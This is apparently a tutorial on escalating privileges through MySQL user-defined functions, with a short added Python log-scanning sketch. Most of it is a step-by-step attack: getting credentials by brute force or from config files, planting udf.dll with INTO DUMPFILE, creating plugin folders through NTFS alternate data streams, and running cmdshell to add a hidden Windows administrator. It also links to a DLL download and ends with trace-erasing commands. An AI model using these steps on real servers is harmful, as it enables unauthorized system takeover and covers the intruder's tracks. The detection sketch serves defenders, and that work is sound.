1. Summary of the UDF privilege-escalation method
Obtain the MySQL database account and password through weak passwords, brute forcing, website configuration files or other means, so that you are able to connect.
(1) Assign the hexadecimal encoding of udf.dll to the @my_udf_a variable
set @my_udf_a=concat('', <hex encoding of the DLL>);
(2) Create the table my_udf_data with a field data of type LONGBLOB.
udf.dll:
https://pan.baidu.com/s/1FY8Ej1tMDGdbb5OEcx3BgA
create table my_udf_data(data LONGBLOB);
(3) Update the my_udf_data table with the data in @my_udf_a.
insert into my_udf_data values("");
update my_udf_data set data = @my_udf_a;
(4) Determine the DLL export path
MySQL < 5.0: the export path is arbitrary. 5.0 <= MySQL < 5.1: the DLL must be exported to a system directory on the target server (for example system32), otherwise you will see the error "No paths allowed for shared library" in the next step. MySQL > 5.1: the DLL must be exported to the plugin path, which can be viewed with the following command:
show variables like '%plugin%';
(5) Export the DLL
The .dll file can be given any name.
* In some cases you will run into a "Can't open shared library" error and need to export udf.dll to the lib\plugin directory, but by default the plugin directory does not exist. What then? Fortunately there is a known method: creating the folders using NTFS ADS streams.
select @@basedir; -- find the MySQL directory
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; -- use NTFS ADS to create the lib directory
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; -- use NTFS ADS to create the plugin directory
(6) Escalate privileges using the cmdshell function
select cmdshell('net user x x /add');
select cmdshell('net localgroup administrators x /add');
(7) Erase traces:
drop table my_udf_data;drop function cmdshell;
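The statements in steps (2) to (7) leave a recognizable trail in a MySQL query log. The following detection sketch is an added example, not part of the original page; the log line layout (timestamp, connection id, `Query`, statement), the indicator labels and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for the statements shown in the steps above, matched per logged query.
# "cmdshell" is only the function name this page uses; a real UDF can be named anything.
INDICATORS = {
    "blob_staging": re.compile(r"create\s+table\s+\w+\s*\(\s*\w+\s+longblob\s*\)", re.I),
    "plugin_dir_probe": re.compile(r"show\s+variables\s+like\s+'%plugin%'", re.I),
    "dumpfile_write": re.compile(r"\binto\s+dumpfile\b", re.I),
    "ntfs_ads_mkdir": re.compile(r"into\s+dumpfile\s+'[^']*::\$INDEX_ALLOCATION'", re.I),
    "udf_shell_call": re.compile(r"\bcmdshell\s*\(", re.I),
    "udf_cleanup": re.compile(r"\bdrop\s+function\b", re.I),
}
# Indicators that have no ordinary application use and flag a session on their own.
HIGH_CONFIDENCE = {"ntfs_ads_mkdir", "udf_shell_call"}
# Assumed simplified layout: <timestamp> <connection id> Query <statement>
LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")

# Constructed sample log: 41 is normal traffic, 57 replays the steps above,
# 63 is a lone INTO DUMPFILE export that should not be flagged by itself.
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z 41 Query select * from orders where id = 7
2024-05-01T10:00:02Z 57 Query create table my_udf_data(data LONGBLOB)
2024-05-01T10:00:03Z 57 Query show variables like '%plugin%'
2024-05-01T10:00:04Z 57 Query select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'
2024-05-01T10:00:05Z 57 Query select cmdshell('net user x x /add')
2024-05-01T10:00:06Z 57 Query drop table my_udf_data;drop function cmdshell
2024-05-01T10:00:07Z 63 Query select name into dumpfile '/tmp/report.bin' from exports
""".strip().splitlines()

def scan(lines):
    """Return {connection_id: set of indicator labels seen on that connection}."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not a query line in the assumed layout
        conn, stmt = int(m.group(2)), m.group(3)
        for label, pattern in INDICATORS.items():
            if pattern.search(stmt):
                hits[conn].add(label)
    return dict(hits)

def flagged(lines, min_hits=2):
    """Connections with a high-confidence indicator or at least min_hits distinct ones."""
    return sorted(c for c, h in scan(lines).items()
                  if h & HIGH_CONFIDENCE or len(h) >= min_hits)

if __name__ == "__main__":
    for conn in flagged(SAMPLE_LOG):
        print(conn, sorted(scan(SAMPLE_LOG)[conn]))
```

Correlating by connection id matters because each statement on its own (a LONGBLOB table, a plugin variable lookup) can be legitimate; it is the sequence on one session that stands out.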
2. UDF Trojan privilege escalation
Enter the database account and password
Follow the instructions to
Privilege escalation: mysql-udf